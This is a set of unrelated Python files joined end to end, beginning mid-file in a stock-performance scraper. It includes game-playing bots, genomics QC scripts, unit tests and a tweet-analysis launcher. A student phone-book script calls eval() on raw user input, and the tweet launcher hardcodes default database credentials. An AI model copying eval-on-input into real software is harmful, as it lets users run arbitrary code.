              #print(stock_price)
            except:
              try:
                stock_price = (source.split('<span class="time_rtq_ticker">')[1].split('</span>')[0])
                #print(stock_price)
                stock_price = re.search(r'(\d{1,8}\.\d{1,8})', stock_price)
                stock_price = float(stock_price.group(1))
                #print(stock_price)
              except:
                print('wtf stock price lol',ticker,file, value)
                time.sleep(5)
                      
          if not starting_stock_value:
            starting_stock_value = stock_price

          if not starting_sp500_value:
            starting_sp500_value = sp500_value


          stock_p_change = ((stock_price - starting_stock_value) / starting_stock_value) * 100
          sp500_p_change = ((sp500_value - starting_sp500_value) / starting_sp500_value) * 100

          location = len(df['Date'])
          difference = stock_p_change-sp500_p_change
          if difference > 0:
            status = "outperform"
          else:
            status = "underperform"

          df = df.append({'Date':date_stamp,
                          'Unix':unix_time,
                          'Ticker':ticker,
                          'DE Ratio':value,
                          'Price':stock_price,
                          'stock_p_change':stock_p_change,
                          'SP500':sp500_value,
                          'sp500_p_change':sp500_p_change,
                          ############################
                          'Difference':difference,
                          'Status':status},
                         ignore_index=True)
        except Exception as e:
          pass
          #print(ticker,e,file, value)

  #print(ticker_list)   
  #print(df)

  for each_ticker in ticker_list:
    try:
      plot_df = df[(df['Ticker'] == each_ticker)]
      plot_df = plot_df.set_index(['Date'])
      if plot_df['Status'][-1] == 'underperform':
        color = 'r'
      else:
        color = 'g'
      plot_df['Difference'].plot(label=each_ticker, color=color)
      plt.legend()
    except Exception as e:
      print(str(e))

  plt.show()

  save = gather.replace(' ','').replace(')','').replace('(','').replace('/','')+str('.csv')
  print(save)
  df.to_csv(save)
    
Key_Stats()

from __future__ import absolute_import

from .base import WhiteNoise

__version__ = '2.0.3'

__all__ = ['WhiteNoise']

import struct

''' Refer to docs for all the exact formats. There are many so check them out before converting things yourself '''
''' If there's a specific offset you want to do things from, use pack_into and unack_into from the docs '''

#Integer to string
i1= 1234
print "Int to string as 8 byte little endian", repr(struct.pack("<Q",i1))
print "Int to string as 8 byte big endian", repr(struct.pack(">Q",i1))

#String to integer. Make sure size of destination matches the length of the string
s1= '1234'
print "String to 4 byte integer little endian", struct.unpack("<i", s1)
print "String to 4 byte integer big endian", struct.unpack(">i", s1)

''' Whenever you want to convert to and from binary, think of binascii '''
import binascii
h1= binascii.b2a_hex(s1)
print "String to hex", h1
uh1= binascii.a2b_hex(h1)
print "Hex to string, even a binary string", uh1

# -*- coding: utf-8 -*-

# Copyright (c) 2016 Jérémie DECOCK (http://www.jdhp.org)

# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:

# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
 
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.

"""
TODO...
"""

__all__ = ['GreedyPlayer']

import random

from jdhp.tictactoe.player.abstract import Player

class GreedyPlayer(Player):
    """
    TODO...
    """

    def play(self, game, state):
        """
        TODO...
        """
        action_list = game.getSetOfValidActions(state)

        choosen_action = None

        # Choose actions that lead to immediate victory...
        for action in action_list:
            next_state = game.nextState(state, action, self)
            if game.hasWon(self, next_state):
                choosen_action = action
                break

        # ... otherwise choose randomly
        if choosen_action is None:
            #print("randomly choose action")    # debug
            choosen_action = random.choice(action_list)

        return choosen_action

__author__ = 'besta'


class BestaPlayer:

    def __init__(self, fichier, player):
        self.fichier = fichier
        self.grille = self.getFirstGrid()
        self.best_hit = 0
        self.players = player

    def getFirstGrid(self):
        """
        Implements function to get the first grid.

        :return: the grid.
        """
        li = []
        with open(self.fichier, 'r') as fi:
            for line in fi.readlines():
                li.append(line)
        return li

    def updateGrid(self):
        """
        Implements function to update the grid to alter n-1
        round values

        """
        with open(self.fichier, 'r') as fi:
            for line in fi.readlines():
                i = 0
                for car in line:
                    j = 0
                    if car != '\n':
                        self.grille[i][j] = car
                        j += 1
                    i += 1

    def grilleEmpty(self):
        """
        Implement function to check if the grid is empty.

        """
        for line in self.grille:
            for car in line[:len(line) - 1]:
                if car != '0':
                    return False
        return True

    def checkLines(self, player, inARow):
        """
        Implements function to check the current lines setup to evaluate best combinaison.

        :param player: check for your numbers (your player number) or those of your opponent.
        :param inARow: how many tokens in a row (3 or 2).
        :return: true or false

        """
        count = 0
        flag = False
        for line_number, line in enumerate(self.grille):
            count = 0
            for car_pos, car in enumerate(line[:len(line) - 1]):
                if int(car) == player and not flag:
                    count = 1
                    flag = True
                elif int(car) == player and flag:
                    count += 1
                    if count == inARow:
                        if car_pos - inARow >= 0 and self.canPlayLine(line_number, car_pos - inARow):
                            return True, car_pos - inARow
                        if car_pos + 1 <= 6 and self.canPlayLine(line_number, car_pos + 1):
                            return True, car_pos + 1
                else:
                    count = 0
        return False, 0

    def canPlayLine(self, line, col):
        """
        Function to check if we can fill the line with a token.
        :param line: which line
        :param col: which column
        :return: true or false
        """
        if line == 5:
            return self.grille[line][col] == '0'
        else:
            return self.grille[line][col] == '0' and self.grille[line + 1][col] != '0'

    def changeColumnInLines(self):
        """
        Implements function to transform columns in lines to make tests eaiser.
        :return: a reverse matrice
        """
        column = []
        for x in xrange(7):
            col = ''
            for y in xrange(6):
                col += self.grille[y][x]
            column.append(col)
        return column

    def checkColumns(self, player, inARow):
        """
        Implements function to check the current columns setup to evaluate best combinaison.

        :param player: check for your numbers (your player number) or those of your opponent.
        :param inARow: how many tokens in a row (3 or 2).
        :return: true or false

        """

        column = self.changeColumnInLines()
        count = 0
        flag = False
        for col_number, line in enumerate(column):
            count = 0
            for car_pos, car in enumerate(line):
                if int(car) == player and not flag:
                    count = 1
                    flag = True
                elif int(car) == player and flag:
                    count += 1
                    if count == inARow and car_pos - inARow >= 0 and self.grille[car_pos - inARow][col_number] == '0':
                        return True, col_number
                else:
                    count = 0
        return False, 0

    def checkDiagonalLeftToRight(self, player, inARow):
        """
        Implements function to check the current diagonal to evaluate best combinaison.

        :param player: check for your numbers or opponent ones.
        :param inARow:  how many tokens in a row (3 or 2).
        :return:
        """

        x = 3
        flag = False
        while x < 6:
            count = 0
            x_int = x
            y_int = 0
            while x_int >= 0:
                if int(self.grille[x_int][y_int]) == player and not flag:
                    count = 1
                    flag = True
                elif int(self.grille[x_int][y_int]) == player and flag:
                    count += 1
                    if count == inARow and y_int + 1 <= 6 and x_int - 1 >= 0 and self.grille[x_int][y_int + 1] != '0':
                        return True, y_int + 1
                else:
                    count = 0
                    flag = False
                x_int -= 1
                y_int += 1
            x += 1

        y = 1
        flag = False
        while y <= 3:
            count = 0
            x_int = 5
            y_int = y
            while y_int <= 6 and x_int >= 0:
                if int(self.grille[x_int][y_int]) == player and not flag:
                    count = 1
                    flag = True
                elif int(self.grille[x_int][y_int]) == player and flag:
                    count += 1
                    if count == inARow and y_int + 1 <= 6 and x_int - 1 >= 0 and self.grille[x_int][y + 1] != '0':
                        return True, y_int + 1
                else:
                    count = 0
                    flage = False
                x_int -= 1
                y_int += 1
            y += 1

        return False, 0

    def checkDiagonalRightToLeft(self, player, inARow):
        """
        Implements function to check the current diagonal to evaluate best combinaison.

        :param player: check for your numbers or opponent ones.
        :param inARow:  how many tokens in a row (3 or 2).
        :return:
        """

        x = 3
        flag = False
        while x < 6:
            count = 0
            x_int = x
            y_int = 6
            while x_int >= 0:
                if int(self.grille[x_int][y_int]) == player and not flag:
                    count = 1
                    flag = True
                elif int(self.grille[x_int][y_int]) == player and flag:
                    count += 1
                    if count == inARow and y_int - 1 >= 0 and x_int - 1 >= 0 and self.grille[x_int][y_int - 1] != '0':
                        return True, y_int - 1
                else:
                    count = 0
                    flag = False
                x_int -= 1
                y_int -= 1
            x += 1

        y = 5
        flag = False
        while y <= 3:
            count = 0
            x_int = 5
            y_int = y
            while y_int >= 3 and x_int >= 0:
                if int(self.grille[x_int][y_int]) == player and not flag:
                    count = 1
                    flag = True
                elif int(self.grille[x_int][y_int]) == player and flag:
                    count += 1
                    if count == inARow and y_int - 1 >= 0 and x_int - 1 >= 0 and self.grille[x_int][y - 1] != '0':
                        return True, y_int - 1
                else:
                    count = 0
                    flage = False
                x_int -= 1
                y_int -= 1
            y -= 1

        return False, 0

    def checkDiagonals(self, player, inARow):
        """
        Calls two diagonal functional.
        :return: an int, representing the column where to play or 0 and False if there is no pattern search.
        """
        check = self.checkDiagonalLeftToRight(player, inARow)
        if check[0]:
            return check
        else:
            return self.checkDiagonalRightToLeft(player, inARow)

    def playSomeColumn(self, player, inARow):
        """
        Call all function for a player and a number of tokens given.
        :param player: which player
        :param inARow: how many token
        :return: true or false (col number if true)
        """
        methods = {'checklines': self.checkLines, 'checkcolumn': self.checkColumns, 'checkdiagonal': self.checkDiagonals}
        for key, function in methods.items():
            which_col = function(player, inARow)
            if which_col[0]:
                return which_col
        return False, 0

    def findFirstColumnEmpty(self):
        """
        Implements function to get the first column where a slot remain.
        :return: the column
        """
        for col in xrange(7):
            if self.grille[0][col] == '0':
                return col
        return -1

    def decideColumn(self):
        """
        Implements main function : to decide what is the better hit to do.

        :return: an int, representing the column where we play
        """
        if self.grilleEmpty():
            return 3

        li_sequence = [3, 2, 1]
        li_players = [self.players[0], self.players[1]]
        for sequence in li_sequence:
            for player in li_players:
                choosen_col = self.playSomeColumn(player, sequence)
                if choosen_col[0]:
                    return choosen_col[1]

        return self.findFirstColumnEmpty()

# User info wrapper object
import logging

class User(object):
    """
    Wrapper object around an entry in users.json. Behaves like a read-only dictionary if
    asked, but adds some useful logic to decouple the front end from the JSON structure.
    """

    _NAME_KEYS = ["display_name", "real_name"]
    _DEFAULT_IMAGE_KEY = "image_512"

    def __init__(self, raw_data):
        self._raw = raw_data

    def __getitem__(self, key):
        return self._raw[key]

    @property
    def display_name(self):
        """
        Find the most appropriate display name for a user: look for a "display_name", then
        a "real_name", and finally fall back to the always-present "name".
        """
        for k in self._NAME_KEYS:
            if self._raw.get(k):
                return self._raw[k]
            if "profile" in self._raw and self._raw["profile"].get(k):
                return self._raw["profile"][k]
        return self._raw["name"]

    @property
    def email(self):
        """
        Shortcut property for finding the e-mail address or bot URL.
        """
        if "profile" in self._raw:
            email = self._raw["profile"].get("email")
        elif "bot_url" in self._raw:
            email = self._raw["bot_url"]
        else:
            email = None
        if not email:
            logging.debug("No email found for %s", self._raw.get("name"))
        return email

    def image_url(self, pixel_size=None):
        """
        Get the URL for the user icon in the desired pixel size, if it exists. If no
        size is supplied, give the URL for the full-size image.
        """
        if "profile" not in self._raw:
            return
        profile = self._raw["profile"]
        if (pixel_size):
            img_key = "image_%s" % pixel_size
            if img_key in profile:
                return profile[img_key]
        return profile[self._DEFAULT_IMAGE_KEY]


def deleted_user(id):
    """
    Create a User object for a deleted user.
    """
    deleted_user = {
        "id": id,
        "name": "deleted-" + id,
        "deleted": True,
        "is_bot": False,
        "is_app_user": False,
    }
    return User(deleted_user)

#!/hpf/largeprojects/ccmbio/naumenko/tools/bcbio/anaconda/bin/python

"""
Looks for a specific sample
"""

import re
import sys
import os
import os.path

sample = sys.argv[1]

family,sample_only = sample.split("_")

match = re.match('\d*',family)

if match:
    prefix=str(int(match.group(0))/100)
    report_path = prefix+'x/'+family
    
    report=0
    bam=0
    
    errors = []
    
    if os.path.isfile(report_path+'/'+family+'.csv'):
	#print("Report exists")
	report=1
    else:
	errors.append('Error: no report')
	
    if os.path.isfile(report_path+'/'+sample+'.bam'):
	#print("Bam exists")
	bam=1
    else:
	errors.append(' ERROR: no bam')
	
    if (bam==1 and report==1):
        print(sample+'\t'+os.getcwd()+"/"+report_path+"\t"+os.getcwd()+"/"+report_path+'/'+sample+'.bam')
    else:
	print(sample+'\t'+' '.join(errors))
else:
    print("Family ID is not starting with digital")

# -*- coding: utf-8 -*-
"""
Date: 2/2/2017

Team: Satoshi Nakamoto
@Authors: Alex Levering and Hector Muro

Non-standard dependencies:
* Twython
* NLTK
* Folium
* Geocoder
* psycopg2

TO DO BEFOREHAND:
The following steps are non-automatable and have to be performed manually.
* Have the NLTK vader lexicon locally (nltk.download("vader_lexicon"))
* Have PostGIS installed on PostgreSQL
* Set the file paths specified below to wherever your folder is
* Upgrade folium to the latest version (0.2.1)
"""



# Naming options for tables, intermediates and outputs are available in the wrapper.
if __name__ == "__main__":
    """
        The tool is not supplied with Tweets out-of-the-box. Set 'gather_data' to True and leave it
        running for a while. If loop is false it will terminate in a minute or so and create a map from the results automatically
        
        This tool was tested and intended for OSGeo Live installs used in the GeoScripting course.
    """
    import tweetAnalysisWrapper
    tweetAnalysisWrapper.performTweetResearch(folder_path = r"/home/user/git/SatoshiNakamotoGeoscripting/Final_assignment",
                                              defaultdb = "postgres", # Making a new database requires connecting to an existing database
                                              user = "user", # PostgreSQL username (user is default value on OSGeo Live)
                                              password = "user", # PostgreSQL password (user is default on OSGeo Live)
                                              ouputdb = "tweet_research", # Specify the output database that is to be created
                                              tweet_table_name = "tweets", # Output table where the Tweets are stored
                                              gather_data = True, # When True: Will gather data from the Twitter stream
                                              search_terms = ["Trump"], # Twitter terms to search for                                   
                                              loop_gathering = False, # When True: Will not stop gathering when terminated - use for prolonged gathering
                                              APP_KEY = "", # Get these from developer.twitter.com when you make your application
                                              APP_SECRET =  "",
                                              OAUTH_TOKEN =  "",
                                              OAUTH_TOKEN_SECRET = "")

#!/usr/bin/python
#coding: utf-8

from __future__ import unicode_literals

import os
import unittest
import xlrd

import msp.schedule_parser as schedule_parser

__author__ = "Andrey Konovalov"
__copyright__ = "Copyright (C) 2014 Andrey Konovalov"
__license__ = "MIT"
__version__ = "0.1"

this_dir, this_filename = os.path.split(__file__)
SCHEDULE_PATH = os.path.join(this_dir, "..", "data", "2013_fall", "4kurs.xls")

class WeekdayRangeTest(unittest.TestCase):
  def setUp(self):
    self.schedule = schedule_parser.Schedule()
    self.schedule.Parse(SCHEDULE_PATH)

  def runTest(self):
    self.assertEqual(self.schedule.GetWeekdayRange(0), (4, 11))
    self.assertEqual(self.schedule.GetWeekdayRange(1), (12, 19))
    self.assertEqual(self.schedule.GetWeekdayRange(2), (20, 27))
    self.assertEqual(self.schedule.GetWeekdayRange(3), (28, 37))
    self.assertEqual(self.schedule.GetWeekdayRange(4), (38, 47))
    self.assertEqual(self.schedule.GetWeekdayRange(5), (48, 57))

class DepartmentCountTest(unittest.TestCase):
  def setUp(self):
    self.schedule = schedule_parser.Schedule()
    self.schedule.Parse(SCHEDULE_PATH)

  def runTest(self):
    self.assertEqual(self.schedule.GetDepartmentCount(), 9)

class DepartmentRangeTest(unittest.TestCase):
  def setUp(self):
    self.schedule = schedule_parser.Schedule()
    self.schedule.Parse(SCHEDULE_PATH)

  def runTest(self):
    self.assertEqual(self.schedule.GetDepartmentRange(0), (2, 11))
    self.assertEqual(self.schedule.GetDepartmentRange(1), (13, 20))
    self.assertEqual(self.schedule.GetDepartmentRange(2), (22, 32))
    self.assertEqual(self.schedule.GetDepartmentRange(3), (34, 36))
    self.assertEqual(self.schedule.GetDepartmentRange(4), (38, 43))
    self.assertEqual(self.schedule.GetDepartmentRange(5), (45, 53))
    self.assertEqual(self.schedule.GetDepartmentRange(6), (55, 62))
    self.assertEqual(self.schedule.GetDepartmentRange(7), (64, 71))
    self.assertEqual(self.schedule.GetDepartmentRange(8), (73, 77))

class DepartmentsRowTest(unittest.TestCase):
  def setUp(self):
    self.schedule = schedule_parser.Schedule()
    self.schedule.Parse(SCHEDULE_PATH)

  def runTest(self):
    self.assertEqual(self.schedule.GetDepartmentsRow(), 3)

class HoursColumnTest(unittest.TestCase):
  def setUp(self):
    self.schedule = schedule_parser.Schedule()
    self.schedule.Parse(SCHEDULE_PATH)

  def runTest(self):
    self.assertEqual(self.schedule.GetHoursColumn(), 1)

class HoursRangesTest(unittest.TestCase):
  def setUp(self):
    self.schedule = schedule_parser.Schedule()
    self.schedule.Parse(SCHEDULE_PATH)

  def runTest(self):
    self.assertEqual(self.schedule.GetHoursRanges(0), [(4, 5), (5, 6), (6, 7), (7, 8), (8, 9), (9, 10), (10, 11)])
    self.assertEqual(self.schedule.GetHoursRanges(3), [(28, 30), (30, 31), (31, 32), (32, 34), (34, 35), (35, 36), (36, 37)])
    self.assertEqual(self.schedule.GetHoursRanges(5), [(48, 49), (49, 50), (50, 52), (52, 53), (53, 54), (54, 56), (56, 57)])

class GroupCountTest(unittest.TestCase):
  def setUp(self):
    self.schedule = schedule_parser.Schedule()
    self.schedule.Parse(SCHEDULE_PATH)

  def runTest(self):
    self.assertEqual(self.schedule.GetGroupCount(0), 9)
    self.assertEqual(self.schedule.GetGroupCount(1), 7)
    self.assertEqual(self.schedule.GetGroupCount(2), 8)
    self.assertEqual(self.schedule.GetGroupCount(3), 2)
    self.assertEqual(self.schedule.GetGroupCount(4), 5)
    self.assertEqual(self.schedule.GetGroupCount(5), 8)
    self.assertEqual(self.schedule.GetGroupCount(6), 7)
    self.assertEqual(self.schedule.GetGroupCount(7), 7)
    self.assertEqual(self.schedule.GetGroupCount(8), 4)

class GroupListTest(unittest.TestCase):
  def setUp(self):
    self.schedule = schedule_parser.Schedule()
    self.schedule.Parse(SCHEDULE_PATH)

  def runTest(self):
    self.assertEqual(self.schedule.GetGroupList(0), ['011', '012', '013', '014', '015', '016', '017', '018', '019'])
    self.assertEqual(self.schedule.GetGroupList(1), ['021', '022', '023', '024', '025', '026', '028'])
    self.assertEqual(self.schedule.GetGroupList(3), ['041', '042'])
    self.assertEqual(self.schedule.GetGroupList(8), ['0111', '0112', '0113', '0114'])


class GroupRangeTest(unittest.TestCase):
  def setUp(self):
    self.schedule = schedule_parser.Schedule()
    self.schedule.Parse(SCHEDULE_PATH)

  def runTest(self):
    self.assertEqual(self.schedule.GetGroupRange(0, 0), (2, 3))
    self.assertEqual(self.schedule.GetGroupRange(0, 1), (3, 4))
    self.assertEqual(self.schedule.GetGroupRange(2, 1), (23, 25))
    self.assertEqual(self.schedule.GetGroupRange(2, 2), (25, 26))
    self.assertEqual(self.schedule.GetGroupRange(2, 3), (26, 28))
    self.assertEqual(self.schedule.GetGroupRange(5, 3), (48, 49))
    self.assertEqual(self.schedule.GetGroupRange(8, 0), (73, 74))
    self.assertEqual(self.schedule.GetGroupRange(8, 3), (76, 77))

class WeekdayByRowTest(unittest.TestCase):
  def setUp(self):
    self.schedule = schedule_parser.Schedule()
    self.schedule.Parse(SCHEDULE_PATH)

  def runTest(self):
    self.assertEqual(self.schedule.GetWeekdayByRow(4), 0)
    self.assertEqual(self.schedule.GetWeekdayByRow(5), 0)
    self.assertEqual(self.schedule.GetWeekdayByRow(10), 0)
    self.assertEqual(self.schedule.GetWeekdayByRow(13), 1)
    self.assertEqual(self.schedule.GetWeekdayByRow(25), 2)
    self.assertEqual(self.schedule.GetWeekdayByRow(26), 2)
    self.assertEqual(self.schedule.GetWeekdayByRow(28), 3)
    self.assertEqual(self.schedule.GetWeekdayByRow(44), 4)
    self.assertEqual(self.schedule.GetWeekdayByRow(48), 5)
    self.assertEqual(self.schedule.GetWeekdayByRow(56), 5)

class PairByRowTest(unittest.TestCase):
  def setUp(self):
    self.schedule = schedule_parser.Schedule()
    self.schedule.Parse(SCHEDULE_PATH)

  def runTest(self):
    self.assertEqual(self.schedule.GetPairByRow(4), (0, 0))
    self.assertEqual(self.schedule.GetPairByRow(5), (1, 0))
    self.assertEqual(self.schedule.GetPairByRow(10), (6, 0))
    self.assertEqual(self.schedule.GetPairByRow(12), (0, 0))
    self.assertEqual(self.schedule.GetPairByRow(28), (0, 0))
    self.assertEqual(self.schedule.GetPairByRow(29), (0, 1))
    self.assertEqual(self.schedule.GetPairByRow(30), (1, 0))
    self.assertEqual(self.schedule.GetPairByRow(33), (3, 1))
    self.assertEqual(self.schedule.GetPairByRow(56), (6, 0))

class DepartmentByColumnTest(unittest.TestCase):
  def setUp(self):
    self.schedule = schedule_parser.Schedule()
    self.schedule.Parse(SCHEDULE_PATH)

  def runTest(self):
    self.assertEqual(self.schedule.GetDepartmentIndexByColumn(2), 0)
    self.assertEqual(self.schedule.GetDepartmentIndexByColumn(3), 0)
    self.assertEqual(self.schedule.GetDepartmentIndexByColumn(10), 0)
    self.assertEqual(self.schedule.GetDepartmentIndexByColumn(13), 1)
    self.assertEqual(self.schedule.GetDepartmentIndexByColumn(18), 1)
    self.assertEqual(self.schedule.GetDepartmentIndexByColumn(19), 1)
    self.assertEqual(self.schedule.GetDepartmentIndexByColumn(22), 2)
    self.assertEqual(self.schedule.GetDepartmentIndexByColumn(24), 2)
    self.assertEqual(self.schedule.GetDepartmentIndexByColumn(31), 2)
    self.assertEqual(self.schedule.GetDepartmentIndexByColumn(39), 4)
    self.assertEqual(self.schedule.GetDepartmentIndexByColumn(64), 7)
    self.assertEqual(self.schedule.GetDepartmentIndexByColumn(70), 7)
    self.assertEqual(self.schedule.GetDepartmentIndexByColumn(73), 8)
    self.assertEqual(self.schedule.GetDepartmentIndexByColumn(76), 8)

class GroupByColumnTest(unittest.TestCase):
  def setUp(self):
    self.schedule = schedule_parser.Schedule()
    self.schedule.Parse(SCHEDULE_PATH)

  def runTest(self):
    self.assertEqual(self.schedule.GetGroupIndexByColumn(2), (0, 0))
    self.assertEqual(self.schedule.GetGroupIndexByColumn(3), (1, 0))
    self.assertEqual(self.schedule.GetGroupIndexByColumn(10), (8, 0))
    self.assertEqual(self.schedule.GetGroupIndexByColumn(23), (1, 0))
    self.assertEqual(self.schedule.GetGroupIndexByColumn(24), (1, 1))
    self.assertEqual(self.schedule.GetGroupIndexByColumn(25), (2, 0))
    self.assertEqual(self.schedule.GetGroupIndexByColumn(26), (3, 0))
    self.assertEqual(self.schedule.GetGroupIndexByColumn(27), (3, 1))
    self.assertEqual(self.schedule.GetGroupIndexByColumn(76), (3, 0))

def suite():
  loader = unittest.TestLoader()
  suite = unittest.TestSuite()
  suite.addTest(WeekdayRangeTest())
  suite.addTest(DepartmentCountTest())
  suite.addTest(DepartmentRangeTest())
  suite.addTest(DepartmentsRowTest())
  suite.addTest(HoursColumnTest())
  suite.addTest(HoursRangesTest())
  suite.addTest(GroupCountTest())
  suite.addTest(GroupListTest())
  suite.addTest(GroupRangeTest())
  suite.addTest(WeekdayByRowTest())
  suite.addTest(PairByRowTest())
  suite.addTest(DepartmentByColumnTest())
  suite.addTest(GroupByColumnTest())
  return suite

if __name__ == '__main__':
   unittest.TextTestRunner(verbosity=2).run(suite())


import gzip
import glob

import numpy as np
import pandas as pd

from scipy.stats import pearsonr
from scipy.stats import spearmanr


def get_num_lines_gz(filename):
    num_lines = 0
    with gzip.open(filename, "r") as fp:
        for line in fp:
            num_lines += 1
    
    return num_lines


def main():
    """get stats from PAS-seq
    
    - num reads per file
    - gene quant level spearman correlations

    """
    
    # files
    DATA_DIR = "/mnt/lab_data/kundaje/projects/skin/data/bds/processed.chipseq.2017-01-23.histones"
    
    # params
    marks = ["H3K27ac", "H3K4me1", "H3K27me3", "CTCF"]
    days = np.arange(0, 7, 3)
    days = ["d{}".format(day).replace(".", "") for day in days]
    reps = ["1", "2"]
    
    # results 
    results = {}
    results["mark_or_tf"] = [] 
    results["timepoint"] = []
    results["replicate"] = []
    #results["num_input_reads"] = []
    results["num_nodup_reads"] = []
    results["NRF"] = []
    results["PBC1"] = []
    results["PBC2"] = []
    results["num_macs2_peaks"] = []
    results["num_overlap_peaks"] = []
    results["num_idr_peaks"] = []

    for mark in marks:
        print mark
        for day in days:
            for rep in reps:
            
                # timepoint, rep
                results["mark_or_tf"].append(mark)
                results["timepoint"].append(day)
                results["replicate"].append(rep)

                # nodup reads
                nodup_log = glob.glob(
                    "{}/*{}*{}*/qc/rep{}/*nodup.flagstat.qc".format(
                        DATA_DIR, day, mark, rep))[0]
                with open(nodup_log, "r") as fp:
                    for line in fp:
                        if "in total" in line:
                            num_nodup_reads = line.split("+")[0].strip()
                            results["num_nodup_reads"].append(num_nodup_reads)

                # NRF/PBC1/PBC2
                lib_log = glob.glob(
                    "{}/*{}*{}*/qc/rep{}/*nodup.pbc.qc".format(
                        DATA_DIR, day, mark, rep))[0]
                with open(lib_log, "r") as fp:
                    # cols 5,6,7 is NRF/PBC1/PBC2
                    for line in fp:
                        fields = line.strip().split()
                    results["NRF"].append(fields[4])
                    results["PBC1"].append(fields[5])
                    results["PBC2"].append(fields[6])

                # peak files
                macs2_peaks = glob.glob(
                    "{}/*{}*{}*/peak/macs2/rep{}/*narrowPeak.gz".format(
                        DATA_DIR, day, mark, rep))[0]
                num_macs2 = get_num_lines_gz(macs2_peaks)
                results["num_macs2_peaks"].append(num_macs2)

                if "CTCF" in mark:
                    idr_peaks = glob.glob(
                        "{}/*{}*{}*/peak/idr/true_reps/rep1-rep2/*filt.narrowPeak.gz".format(
                            DATA_DIR, day, mark))[0]
                    num_idr = get_num_lines_gz(idr_peaks)
                    results["num_idr_peaks"].append(num_idr)
                    results["num_overlap_peaks"].append("NA")
                else:
                    results["num_idr_peaks"].append("NA")
                    overlap_peaks = glob.glob(
                        "{}/*{}*{}*/peak/macs2/overlap/*filt.narrowPeak.gz".format(
                            DATA_DIR, day, mark, rep))[0]
                    num_overlap = get_num_lines_gz(overlap_peaks)
                    results["num_overlap_peaks"].append(num_overlap)
                
            
    # dataframe
    results = pd.DataFrame(results)
    ordered_headers = [
        "mark_or_tf",
        "timepoint",
        "replicate",
        #"num_input_reads",
        "num_nodup_reads",
        "NRF",
        "PBC1",
        "PBC2",
        "num_macs2_peaks",
        "num_overlap_peaks",
        "num_idr_peaks"]
    results = results[ordered_headers]
    out_file = "ggr.ChIP-seq.QC.summary.txt"
    results.to_csv(out_file, sep="\t", header=True, index=False)
    
    
    return

main()


student_phoneNumber_name = {1: 'a', 3: 'c', 2: 'b'}

def Handler() :
	while (1) :
		choice = eval(input("Enter :\t 1 - to search student name \n \t 2 - to insert new student record \n \t 0 - to quit\n"))
		print(choice)
		if (choice == 1) :
			if (student_phoneNumber_name) :
				phone_number = input("Enter student's phone number : ")
				name = SearchRecord(phone_number)
				if (name) :
					print("name : " + name )
				else :
					print(str(phone_number) + "Does not exist in record" + str(name))
			else :
				print("Record is empty ")
		elif (choice == 2) :
			phone_number = input("Enter student's phone number : ")
			name = input("Enter student's name : ") #best example to understand input() and raw_input()
			InsertRecord(phone_number, name)
		elif (choice == 0) :
			break
		else:
			print("Enter correct choice")
		

def InsertRecord(x, y):
	student_phoneNumber_name[x] = y
	return;
	
def SearchRecord(x):
	print(x)
	if (x in student_phoneNumber_name) :
		return student_phoneNumber_name[x]
	
	return False
	
		
Handler()

print(student_phoneNumber_name)
""" Tests for Dynamo3 """

import sys
import unittest
from decimal import Decimal
from pickle import dumps, loads
from urllib.parse import urlparse

from botocore.exceptions import ClientError
from mock import ANY, MagicMock, patch

from dynamo3 import (
    Binary,
    Dynamizer,
    DynamoDBConnection,
    DynamoDBError,
    DynamoKey,
    GlobalIndex,
    Limit,
    Table,
    ThroughputException,
)
from dynamo3.constants import STRING
from dynamo3.result import Capacity, ConsumedCapacity, Count, ResultSet, add_dicts


class BaseSystemTest(unittest.TestCase):

    """Base class for system tests"""

    dynamo: DynamoDBConnection = None  # type: ignore

    def setUp(self):
        super(BaseSystemTest, self).setUp()
        # Clear out any pre-existing tables
        for tablename in self.dynamo.list_tables():
            self.dynamo.delete_table(tablename)

    def tearDown(self):
        super(BaseSystemTest, self).tearDown()
        for tablename in self.dynamo.list_tables():
            self.dynamo.delete_table(tablename)
        self.dynamo.clear_hooks()


class TestMisc(BaseSystemTest):

    """Tests that don't fit anywhere else"""

    def tearDown(self):
        super(TestMisc, self).tearDown()
        self.dynamo.default_return_capacity = False

    def test_connection_host(self):
        """Connection can access host of endpoint"""
        urlparse(self.dynamo.host)

    def test_connection_region(self):
        """Connection can access name of connected region"""
        self.assertTrue(isinstance(self.dynamo.region, str))

    def test_connect_to_region(self):
        """Can connect to a dynamo region"""
        conn = DynamoDBConnection.connect("us-west-1")
        self.assertIsNotNone(conn.host)

    def test_connect_to_region_creds(self):
        """Can connect to a dynamo region with credentials"""
        conn = DynamoDBConnection.connect(
            "us-west-1", access_key="abc", secret_key="12345"
        )
        self.assertIsNotNone(conn.host)

    def test_connect_to_host_without_session(self):
        """Can connect to a dynamo host without passing in a session"""
        conn = DynamoDBConnection.connect("us-west-1", host="localhost")
        self.assertIsNotNone(conn.host)

    @patch("dynamo3.connection.time")
    def test_retry_on_throughput_error(self, time):
        """Throughput exceptions trigger a retry of the request"""

        def call(*_, **__):
            """Dummy service call"""
            response = {
                "ResponseMetadata": {
                    "HTTPStatusCode": 400,
                },
                "Error": {
                    "Code": "ProvisionedThroughputExceededException",
                    "Message": "Does not matter",
                },
            }
            raise ClientError(response, "list_tables")

        with patch.object(self.dynamo, "client") as client:
            client.list_tables.side_effect = call
            with self.assertRaises(ThroughputException):
                self.dynamo.call("list_tables")
        self.assertEqual(len(time.sleep.mock_calls), self.dynamo.request_retries - 1)
        self.assertTrue(time.sleep.called)

    def test_describe_missing(self):
        """Describing a missing table returns None"""
        ret = self.dynamo.describe_table("foobar")
        self.assertIsNone(ret)

    def test_magic_table_props(self):
        """Table can look up properties on response object"""
        hash_key = DynamoKey("id")
